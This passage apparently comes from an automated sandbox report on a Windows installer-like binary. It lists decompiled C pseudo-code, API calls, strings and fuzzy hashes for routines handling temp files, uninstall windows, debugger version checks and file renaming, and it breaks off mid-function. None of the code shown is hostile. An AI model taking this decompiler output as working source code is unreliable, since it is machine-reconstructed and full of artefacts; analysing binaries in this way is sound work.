                                                            0x00405ae3
                                                            0x00405ae3
                                                            0x00405ae8
                                                            0x00405af0
                                                            0x00000000
                                                            0x00000000
                                                            0x00405af2
                                                            0x00405af4
                                                            0x00405afb
                                                            0x00000000
                                                            0x00405afd
                                                            0x00405aff
                                                            0x00405b04
                                                            0x00405b09
                                                            0x00405b11
                                                            0x00405b15
                                                            0x00000000
                                                            0x00405b15
                                                            0x00405b11
                                                            0x00000000
                                                            0x00405afb
                                                            0x00405ae3
                                                            0x00405b1c
                                                            0x00405b20
                                                            0x00405b20
                                                            0x00405b26
                                                            0x00405b98
                                                            0x00405b9c
                                                            0x00405ba2
                                                            0x00405ba4
                                                            0x00405bcc
                                                            0x00405bd0
                                                            0x00405bd2
                                                            0x00405bd7
                                                            0x00405bd9
                                                            0x00405bdb
                                                            0x00000000
                                                            0x00405bdd
                                                            0x00405bdd
                                                            0x00405be2
                                                            0x00405be4
                                                            0x00405be5
                                                            0x00405be6
                                                            0x00405be7
                                                            0x00405be7
                                                            0x00405ba6
                                                            0x00405ba6
                                                            0x00405bac
                                                            0x00405bb0
                                                            0x00405bb6
                                                            0x00405bb8
                                                            0x00405bba
                                                            0x00405bba
                                                            0x00405bbc
                                                            0x00405bbe
                                                            0x00405bc4
                                                            0x00000000
                                                            0x00405bc4
                                                            0x00405b28
                                                            0x00405b28
                                                            0x00405b2b
                                                            0x00405b32
                                                            0x00405b39
                                                            0x00405b3c
                                                            0x00405b3f
                                                            0x00405b46
                                                            0x00405b49
                                                            0x00405b4c
                                                            0x00405b4f
                                                            0x00405b51
                                                            0x00405b53
                                                            0x00405b55
                                                            0x00405b5a
                                                            0x00405b5c
                                                            0x00405b5c
                                                            0x00405b5c
                                                            0x00405b63
                                                            0x00405b65
                                                            0x00405b65
                                                            0x00405b63
                                                            0x00405b6c
                                                            0x00405b71
                                                            0x00405b74
                                                            0x00405b7a
                                                            0x00405be8
                                                            0x00405be8
                                                            0x00405be8
                                                            0x00405b7c
                                                            0x00405b7c
                                                            0x00405b7e
                                                            0x00405b82
                                                            0x00405b84
                                                            0x00405b87
                                                            0x00405b8a
                                                            0x00405b8d
                                                            0x00405b91
                                                            0x00405b91
                                                            0x00405bed
                                                            0x00405bed
                                                            0x00405bed
                                                            0x00405bf0
                                                            0x00405bf3
                                                            0x00405bf5
                                                            0x00405bfa
                                                            0x00405bfc
                                                            0x00405bff
                                                            0x00405c06
                                                            0x00405c09
                                                            0x00405c09
                                                            0x00405c0c
                                                            0x00405c10
                                                            0x00405c13
                                                            0x00405c16
                                                            0x00405c18
                                                            0x00405c18
                                                            0x00405c1a
                                                            0x00405c1d
                                                            0x00405c20
                                                            0x00405c23
                                                            0x00405c24
                                                            0x00405c25
                                                            0x00405c26
                                                            0x00405c26
                                                            0x00405a62
                                                            0x00405a62
                                                            0x00405a62
                                                            0x00405a62
                                                            0x00405a66
                                                            0x00405a69
                                                            0x00405a6c
                                                            0x00405a6f
                                                            0x00405a70
                                                            0x00405a70
                                                            0x00405a3d
                                                            0x00405a3d
                                                            0x00405a41
                                                            0x00405a41
                                                            0x00405a44
                                                            0x00405a47
                                                            0x00405a4a
                                                            0x00405a74
                                                            0x00405a77
                                                            0x00405a7a
                                                            0x00405a7d
                                                            0x00405a80
                                                            0x00405a81
                                                            0x00405a4c
                                                            0x00405a4c
                                                            0x00405a4f
                                                            0x00405a50
                                                            0x00405a50
                                                            0x00405a4a
                                                            0x00405a3b

                                                            APIs
                                                            • Sleep.KERNEL32(00000000,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405ABB
                                                            • Sleep.KERNEL32(0000000A,00000000,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405AD1
                                                            • Sleep.KERNEL32(00000000,00000000,?,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405AFF
                                                            • Sleep.KERNEL32(0000000A,00000000,00000000,?,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405B15
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: d5c76b6411e5b1297fee21c622a9732816c4700a6e5391fd7fe9993b0e9394e2
                                                            • Instruction ID: 7a051e160dd760b70f5de690832b1da94a718f6c47d0b95a7d4eebd5f387ad29
                                                            • Opcode Fuzzy Hash: d5c76b6411e5b1297fee21c622a9732816c4700a6e5391fd7fe9993b0e9394e2
                                                            • Instruction Fuzzy Hash: BCC1F272601B118BDB15CF69E884B27BBA2EB85310F18827FD4599F3D5C7B4A841CF94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 39%
                                                            			E0060D3B4(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                            				char _v8;
                                                            				char _v12;
                                                            				intOrPtr _v16;
                                                            				char _v17;
                                                            				char _v24;
                                                            				char _v28;
                                                            				char _v32;
                                                            				char _v36;
                                                            				void* _t60;
                                                            				signed int _t63;
                                                            				intOrPtr _t77;
                                                            				void* _t83;
                                                            				intOrPtr _t86;
                                                            
                                                            				_t64 = 0;
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_v16 = __edx;
                                                            				_v8 = __eax;
                                                            				E0040A2AC(_v8);
                                                            				_push(_t86);
                                                            				_push(0x60d4f1);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t86;
                                                            				E005C4EA4(_v8,  &_v24);
                                                            				E0040A5F0( &_v8, _v24);
                                                            				_t83 = 0x123456;
                                                            				_t63 = 0;
                                                            				_v17 = 0;
                                                            				do {
                                                            					_t83 = _t83 + 1;
                                                            					if(_t83 > 0x1ffffff) {
                                                            						_t83 = 0;
                                                            					}
                                                            					_t90 = 0x123456 - _t83;
                                                            					if(0x123456 == _t83) {
                                                            						_t9 =  &_v32; // 0x6b7447
                                                            						E005C567C(_v8, _t64, _t9, _t90);
                                                            						_t11 =  &_v32; // 0x6b7447
                                                            						E005CD508(0x5a,  &_v28,  *_t11);
                                                            						_t64 = _v28;
                                                            						E00429008(_v28, 1);
                                                            						E004098C4();
                                                            					}
                                                            					_push(_v8);
                                                            					_push("_iu");
                                                            					E0060D21C(_t83, _t63,  &_v36, 0x123456, _t83);
                                                            					_push(_v36);
                                                            					_push(L".tmp");
                                                            					E0040B550( &_v12, _t63, 4, 0x123456, _t83);
                                                            					if(E005C6880(_t90) == 0) {
                                                            						_t63 = 1;
                                                            						_v17 = E005C685C(_v12);
                                                            						if(_v17 != 0) {
                                                            							_t60 = CreateFileW(E0040B278(_v12), 0xc0000000, 0, 0, 2, 0x80, 0);
                                                            							_t63 = 0 | _t60 != 0xffffffff;
                                                            							if(1 != 0) {
                                                            								CloseHandle(_t60);
                                                            							}
                                                            						}
                                                            					}
                                                            				} while (_t63 == 0);
                                                            				E0040A5A8(_v16, _v12);
                                                            				_pop(_t77);
                                                            				 *[fs:eax] = _t77;
                                                            				_push(E0060D4F8);
                                                            				E0040A228( &_v36, 4);
                                                            				return E0040A228( &_v12, 2);
                                                            			}

















                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4A1
                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CloseCreateFileHandle
                                                            • String ID: .tmp$Gtk$_iu
                                                            • API String ID: 3498533004-1320520068
                                                            • Opcode ID: 8f4bd8aeb1207aa4b07bf03847036b0a2b10865cd30baef83bcbefd08e77ff22
                                                            • Instruction ID: 38fd5bd3aef28e796ac18a57f9f91bd27b67d48edde35eb58a18837c564f9665
                                                            • Opcode Fuzzy Hash: 8f4bd8aeb1207aa4b07bf03847036b0a2b10865cd30baef83bcbefd08e77ff22
                                                            • Instruction Fuzzy Hash: 73319030E80209ABDB14EBE4C842BDEBBB5AF54308F118169E904B73D1D738AE458B55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 94%
                                                            			E006B8998(char __ebx, void* __edi, void* __esi, void* __eflags) {
                                                            				intOrPtr* _v8;
                                                            				intOrPtr _v12;
                                                            				char _v16;
                                                            				char _v20;
                                                            				char _v24;
                                                            				char _v28;
                                                            				char _v32;
                                                            				intOrPtr _v40;
                                                            				intOrPtr* _t27;
                                                            				intOrPtr* _t30;
                                                            				intOrPtr _t44;
                                                            				intOrPtr _t48;
                                                            				intOrPtr _t61;
                                                            				intOrPtr _t66;
                                                            				intOrPtr _t92;
                                                            				void* _t96;
                                                            				void* _t97;
                                                            				void* _t98;
                                                            				intOrPtr _t99;
                                                            
                                                            				_t100 = __eflags;
                                                            				_t95 = __esi;
                                                            				_t94 = __edi;
                                                            				_t68 = __ebx;
                                                            				_t97 = _t98;
                                                            				_t99 = _t98 + 0xffffffdc;
                                                            				_v32 = 0;
                                                            				_v28 = 0;
                                                            				_v24 = 0;
                                                            				_v20 = 0;
                                                            				 *[fs:eax] = _t99;
                                                            				_t27 =  *0x6cdec4; // 0x6d579c
                                                            				E005B8250( *_t27, L"Uninstall", __eflags);
                                                            				_t30 =  *0x6cdec4; // 0x6d579c
                                                            				ShowWindow( *( *_t30 + 0x188), 5);
                                                            				 *[fs:edx] = _t99;
                                                            				E006AF824();
                                                            				E005C745C( &_v20);
                                                            				E00424020(_v20);
                                                            				E005C6FB0(0, __ebx,  &_v24, __edi, __esi);
                                                            				E0040A5A8(0x6d68d0, _v24);
                                                            				E006B6C80(__ebx, __edi, __esi, _t100);
                                                            				_t44 =  *0x6d68d0; // 0x0
                                                            				E005C4F90(_t44, _t68,  &_v28, L".dat", _t94, _t95);
                                                            				E0040A5A8(0x6d68d4, _v28);
                                                            				_t48 =  *0x6d68d0; // 0x0
                                                            				E005C4F90(_t48, _t68,  &_v32, L".msg", _t94, _t95);
                                                            				E0040A5A8(0x6d68d8, _v32);
                                                            				_v8 = E005CBFB8(1, 1, 0, 2);
                                                            				 *[fs:eax] = _t99;
                                                            				 *((intOrPtr*)( *_v8 + 4))( *[fs:eax], 0x6b8af0, _t97,  *[fs:edx], 0x6b8c15, _t97,  *[fs:eax], 0x6b8c4e, _t97, __edi, __esi, __ebx, _t96);
                                                            				E005CBF78(_v8, _v40 - 8);
                                                            				E005CBF50(_v8, 8,  &_v16);
                                                            				if(_v16 == 0x67734d49) {
                                                            					_t61 =  *0x6d68d0; // 0x0
                                                            					E005CD6BC(_t61, _t68, 1, _v12, _t94, _t95);
                                                            				} else {
                                                            					_t66 =  *0x6d68d8; // 0x0
                                                            					E005CD6BC(_t66, _t68, 1, 0, _t94, _t95);
                                                            				}
                                                            				_pop(_t92);
                                                            				 *[fs:eax] = _t92;
                                                            				_push(E006B8AF7);
                                                            				return E00408444(_v8);
                                                            			}

                                                            APIs
                                                              • Part of subcall function 005B8250: SetWindowTextW.USER32(?,00000000), ref: 005B8281
                                                            • ShowWindow.USER32(?,00000005,00000000,006B8C4E,?,?,00000000), ref: 006B89DE
                                                              • Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F
                                                              • Part of subcall function 00424020: SetCurrentDirectoryW.KERNEL32(00000000,?,006B8A06,00000000,006B8C15,?,?,00000005,00000000,006B8C4E,?,?,00000000), ref: 0042402B
                                                              • Part of subcall function 005C6FB0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005C7045,?,?,?,00000001,?,0061037E,00000000,006103E9), ref: 005C6FE5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                            • String ID: .dat$.msg$IMsg$Uninstall
                                                            • API String ID: 3312786188-1660910688
                                                            • Opcode ID: f3279caf476708547096f2985ea174fc674a0b957c50a9dc1f64524f0346753e
                                                            • Instruction ID: 43941ce92546cf1f75effb4615d96ab71b8b1f254b2d248514a95b56d5af6042
                                                            • Opcode Fuzzy Hash: f3279caf476708547096f2985ea174fc674a0b957c50a9dc1f64524f0346753e
                                                            • Instruction Fuzzy Hash: 65415CB0A002059FC700EFA4CD96E9EBBB6FB88304F51846AF400A7751DB75AE41DFA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 94%
                                                            			E006153AC(struct HWND__* __eax, signed char __edx, void* __ebp) {
                                                            				char _v16;
                                                            				signed char _v20;
                                                            				char _v24;
                                                            				char _v28;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				intOrPtr _t8;
                                                            				struct HWND__* _t14;
                                                            				void* _t21;
                                                            				intOrPtr* _t22;
                                                            				struct HWND__* _t28;
                                                            				void* _t29;
                                                            				signed char* _t31;
                                                            
                                                            				_t31 =  &_v20;
                                                            				 *_t31 = __edx;
                                                            				_t28 = __eax;
                                                            				_t21 = SendMessageW(__eax, 0xb06, 0, 0);
                                                            				if(_t21 != 0x6020000) {
                                                            					_v28 = _t21;
                                                            					_v24 = 0;
                                                            					_v20 = 0x6020000;
                                                            					_v16 = 0;
                                                            					_t23 = L"Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)";
                                                            					E00429044(_t21, L"Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)", 1, 0x6d62f8, _t28, 1,  &_v28);
                                                            					E004098C4();
                                                            				}
                                                            				 *0x6d62e4 = 1;
                                                            				 *0x6d62f4 = _t28;
                                                            				_t8 =  *0x615310; // 0x615368
                                                            				 *0x6d62f8 = E004785F8(E006158C4, _t8);
                                                            				if( *0x6d62f8 == 0) {
                                                            					E0060CD28(L"Failed to create DebugClientWnd", _t21);
                                                            				}
                                                            				_t29 = 4;
                                                            				_t22 =  *0x6cdb54; // 0x6cceb4
                                                            				do {
                                                            					E005C86E0( *0x6d62f8, _t23,  *_t22);
                                                            					_t22 = _t22 + 4;
                                                            					_t29 = _t29 - 1;
                                                            				} while (_t29 != 0);
                                                            				_t14 =  *0x6d62f4; // 0x0
                                                            				return SendMessageW(_t14, 0xb00,  *0x6d62f8,  *_t31 & 0x000000ff);
                                                            			}

                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000B06,00000000,00000000), ref: 006153C6
                                                            • SendMessageW.USER32(00000000,00000B00,00000000,00000000), ref: 00615463
                                                            Strings
                                                            • hSa, xrefs: 00615415
                                                            • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 006153F2
                                                            • Failed to create DebugClientWnd, xrefs: 0061542C
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd$hSa
                                                            • API String ID: 3850602802-2905362044
                                                            • Opcode ID: 0e412e84a358142af428e011a0e255765662ed08f503d990aefe787644027a64
                                                            • Instruction ID: bd2b79d17f40968884fe1c372ced24de8c60c917dea0cb25488337d16b2a65e4
                                                            • Opcode Fuzzy Hash: 0e412e84a358142af428e011a0e255765662ed08f503d990aefe787644027a64
                                                            • Instruction Fuzzy Hash: 391123B1A403129FE300EB28DC81FDABBD69F94304F08002AF5858B3D2D3749C84C766
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 63%
                                                            			E00624AA4(HANDLE* __eax) {
                                                            				HANDLE* _v8;
                                                            				long _v12;
                                                            				intOrPtr* _t7;
                                                            				long _t11;
                                                            				intOrPtr _t27;
                                                            				void* _t30;
                                                            
                                                            				_v8 = __eax;
                                                            				_push(_t30);
                                                            				_push(0x624b25);
                                                            				_push( *[fs:edx]);
                                                            				 *[fs:edx] = _t30 + 0xfffffff8;
                                                            				do {
                                                            					_t7 =  *0x6cdec4; // 0x6d579c
                                                            					E005B8704( *_t7);
                                                            					_t11 = MsgWaitForMultipleObjects(1, _v8, 0, 0xffffffff, 0x4ff);
                                                            				} while (_t11 == 1);
                                                            				if(_t11 == 0xffffffff) {
                                                            					E0060CE84(L"MsgWaitForMultipleObjects");
                                                            				}
                                                            				if(GetExitCodeProcess( *_v8,  &_v12) == 0) {
                                                            					E0060CE84(L"GetExitCodeProcess");
                                                            				}
                                                            				_pop(_t27);
                                                            				 *[fs:eax] = _t27;
                                                            				_push(E00624B2C);
                                                            				return CloseHandle( *_v8);
                                                            			}

                                                            APIs
                                                            • MsgWaitForMultipleObjects.USER32 ref: 00624AD6
                                                            • GetExitCodeProcess.KERNEL32 ref: 00624AF9
                                                            • CloseHandle.KERNEL32(?,00624B2C,00000001,00000000,000000FF,000004FF,00000000,00624B25), ref: 00624B1F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                            • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                            • API String ID: 2573145106-3235461205
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004070B0(signed int __eax, void* __edx) {
                                                            				short _v530;
                                                            				short _v1052;
                                                            				short _v1056;
                                                            				short _v1058;
                                                            				signed int _t20;
                                                            				void* _t24;
                                                            				WCHAR* _t25;
                                                            
                                                            				_t25 =  &_v1052;
                                                            				_t24 = __edx;
                                                            				_t20 = __eax;
                                                            				if(__eax != 0) {
                                                            					 *_t25 = (__eax & 0x000000ff) + 0x41 - 1;
                                                            					_v1058 = 0x3a;
                                                            					_v1056 = 0;
                                                            					GetCurrentDirectoryW(0x105,  &_v530);
                                                            					SetCurrentDirectoryW(_t25);
                                                            				}
                                                            				GetCurrentDirectoryW(0x105,  &_v1052);
                                                            				if(_t20 != 0) {
                                                            					SetCurrentDirectoryW( &_v530);
                                                            				}
                                                            				return E0040B318(_t24, 0x105,  &_v1052);
                                                            			}











                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 004070E7
                                                            • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 004070ED
                                                            • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 004070FC
                                                            • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 0040710D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CurrentDirectory
                                                            • String ID: :
                                                            • API String ID: 1611563598-336475711
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0059BDE0(int __eax, void* __edx) {
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				signed int _t39;
                                                            				signed int _t40;
                                                            				intOrPtr _t44;
                                                            				int _t45;
                                                            				void* _t47;
                                                            				int _t48;
                                                            				intOrPtr* _t49;
                                                            
                                                            				_t18 = __eax;
                                                            				_t49 = __eax;
                                                            				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
                                                            					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
                                                            						 *((char*)(__eax + 0x80)) = 1;
                                                            						return __eax;
                                                            					}
                                                            					_t19 =  *((intOrPtr*)(__eax + 0x78));
                                                            					if( *((intOrPtr*)(__eax + 0x78)) != 0) {
                                                            						return E0059BDE0(_t19, __edx);
                                                            					}
                                                            					_t18 = GetMenuItemCount(E0059BF18(__eax, _t45, _t47));
                                                            					_t48 = _t18;
                                                            					_t40 = _t39 & 0xffffff00 | _t48 == 0x00000000;
                                                            					while(_t48 > 0) {
                                                            						_t45 = _t48 - 1;
                                                            						_t18 = GetMenuState(E0059BF18(_t49, _t45, _t48), _t45, 0x400);
                                                            						if((_t18 & 0x00000004) == 0) {
                                                            							_t18 = RemoveMenu(E0059BF18(_t49, _t45, _t48), _t45, 0x400);
                                                            							_t40 = 1;
                                                            						}
                                                            						_t48 = _t48 - 1;
                                                            					}
                                                            					if(_t40 != 0) {
                                                            						if( *((intOrPtr*)(_t49 + 0x70)) != 0) {
                                                            							L14:
                                                            							E0059BC9C(_t49, _t45, _t48);
                                                            							L15:
                                                            							return  *((intOrPtr*)( *_t49 + 0x50))();
                                                            						}
                                                            						_t44 =  *0x59a1c4; // 0x59a21c
                                                            						if(E0040868C( *((intOrPtr*)(_t49 + 0x7c)), _t44) == 0 || GetMenuItemCount(E0059BF18(_t49, _t45, _t48)) != 0) {
                                                            							goto L14;
                                                            						} else {
                                                            							DestroyMenu( *(_t49 + 0xbc));
                                                            							 *(_t49 + 0xbc) = 0;
                                                            							goto L15;
                                                            						}
                                                            					}
                                                            				}
                                                            				return _t18;
                                                            			}













                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 92%
                                                            			E005B631C() {
                                                            				intOrPtr _v4;
                                                            				void* _v8;
                                                            				int _t5;
                                                            				void* _t6;
                                                            				intOrPtr _t12;
                                                            				struct HHOOK__* _t14;
                                                            				void* _t19;
                                                            				void* _t20;
                                                            
                                                            				if( *0x6d57c0 != 0) {
                                                            					_t14 =  *0x6d57c0; // 0x0
                                                            					UnhookWindowsHookEx(_t14);
                                                            				}
                                                            				 *0x6d57c0 = 0;
                                                            				_v4 = 0x6d57c4;
                                                            				_t5 = 0;
                                                            				asm("lock xchg [edx], eax");
                                                            				_v8 = 0;
                                                            				if(_v8 != 0) {
                                                            					_t6 =  *0x6d57bc; // 0x0
                                                            					SetEvent(_t6);
                                                            					if(GetCurrentThreadId() !=  *0x6d57b8) {
                                                            						while(MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff) != 0) {
                                                            							_t12 =  *0x6d579c; // 0x0
                                                            							E005B871C(_t12, _t19, _t20);
                                                            						}
                                                            					}
                                                            					_t5 = CloseHandle(_v8);
                                                            				}
                                                            				return _t5;
                                                            			}












                                                            APIs
                                                            • UnhookWindowsHookEx.USER32(00000000), ref: 005B632E
                                                            • SetEvent.KERNEL32(00000000), ref: 005B635A
                                                            • GetCurrentThreadId.KERNEL32 ref: 005B635F
                                                            • MsgWaitForMultipleObjects.USER32 ref: 005B6388
                                                            • CloseHandle.KERNEL32(00000000,00000000), ref: 005B6395
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CloseCurrentEventHandleHookMultipleObjectsThreadUnhookWaitWindows
                                                            • String ID:
                                                            • API String ID: 2132507429-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 84%
                                                            			E006B8F64(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                            				char _v8;
                                                            				char _v12;
                                                            				intOrPtr _v16;
                                                            				intOrPtr _v20;
                                                            				char _v24;
                                                            				char _v28;
                                                            				char _v32;
                                                            				WCHAR* _t43;
                                                            				char _t58;
                                                            				intOrPtr _t68;
                                                            				void* _t72;
                                                            				signed int _t74;
                                                            				void* _t78;
                                                            
                                                            				_v24 = 0;
                                                            				_v8 = 0;
                                                            				_v12 = 0;
                                                            				_v20 = __edx;
                                                            				_v16 = __eax;
                                                            				_push(_t78);
                                                            				_push(0x6b9062);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t78 + 0xffffffe4;
                                                            				E0040A1C8(_v20);
                                                            				E005C5428(_v16, 0,  &_v8);
                                                            				_t72 = 0;
                                                            				_t58 = 0;
                                                            				do {
                                                            					_v32 = _t58;
                                                            					_v28 = 0;
                                                            					E004244F8(L"isRS-%.3u.tmp", 0,  &_v32,  &_v24);
                                                            					E0040B4C8( &_v12, _v24, _v8);
                                                            					_t74 = GetFileAttributesW(E0040B278(_v12));
                                                            					if(_t74 == 0xffffffff) {
                                                            						L5:
                                                            						_t43 = E0040B278(_v12);
                                                            						if(MoveFileExW(E0040B278(_v16), _t43, 1) == 0) {
                                                            							_t72 = _t72 + 1;
                                                            							if(_t72 == 0xa) {
                                                            								break;
                                                            							}
                                                            							goto L8;
                                                            						}
                                                            						E0040A5A8(_v20, _v12);
                                                            						break;
                                                            					}
                                                            					if((_t74 & 0x00000010) != 0) {
                                                            						goto L8;
                                                            					}
                                                            					if((_t74 & 0x00000001) != 0) {
                                                            						SetFileAttributesW(E0040B278(_v12), _t74 & 0xfffffffe);
                                                            					}
                                                            					goto L5;
                                                            					L8:
                                                            					_t58 = _t58 + 1;
                                                            				} while (_t58 != 0x3e8);
                                                            				_pop(_t68);
                                                            				 *[fs:eax] = _t68;
                                                            				_push(E006B9069);
                                                            				E0040A1C8( &_v24);
                                                            				return E0040A228( &_v12, 2);
                                                            			}

















                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000,006B94CE,?,?), ref: 006B8FD4
                                                            • SetFileAttributesW.KERNEL32(00000000,00000000,00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000,006B94CE), ref: 006B8FFD
                                                            • MoveFileExW.KERNEL32(00000000,00000000,00000001,00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000), ref: 006B9016
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: File$Attributes$Move
                                                            • String ID: isRS-%.3u.tmp
                                                            • API String ID: 3839737484-3657609586
                                                            • Opcode ID: 8d4268528f0551a281f2f3f55997a38572bb3cbe4dffdc26fb30d28ba37c9b4b
                                                            • Instruction ID: 31d351f3c97924346b89867796ea0414510024315a00da88274a448b23120628
                                                            • Opcode Fuzzy Hash: 8d4268528f0551a281f2f3f55997a38572bb3cbe4dffdc26fb30d28ba37c9b4b
                                                            • Instruction Fuzzy Hash: AB318170D04218ABCB00EBB9C8859EEB7B9EF48314F51467EF814B7281D7385E818769
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 63%
                                                            			E0060C038(void* __eax, WCHAR* __ecx, WCHAR* __edx, void* __eflags, struct _PROCESS_INFORMATION* _a4, struct _STARTUPINFOW* _a8, char _a12, void* _a16, char _a20, int _a24, struct _SECURITY_ATTRIBUTES* _a28, struct _SECURITY_ATTRIBUTES* _a32) {
                                                            				int _v8;
                                                            				char _v16;
                                                            				long _v20;
                                                            				intOrPtr _t42;
                                                            				void* _t50;
                                                            				void* _t52;
                                                            				intOrPtr _t53;
                                                            
                                                            				_t50 = _t52;
                                                            				_t53 = _t52 + 0xfffffff0;
                                                            				if(E0060BF74(__eax,  &_v16) != 0) {
                                                            					_push(_t50);
                                                            					_push(0x60c0b2);
                                                            					_push( *[fs:eax]);
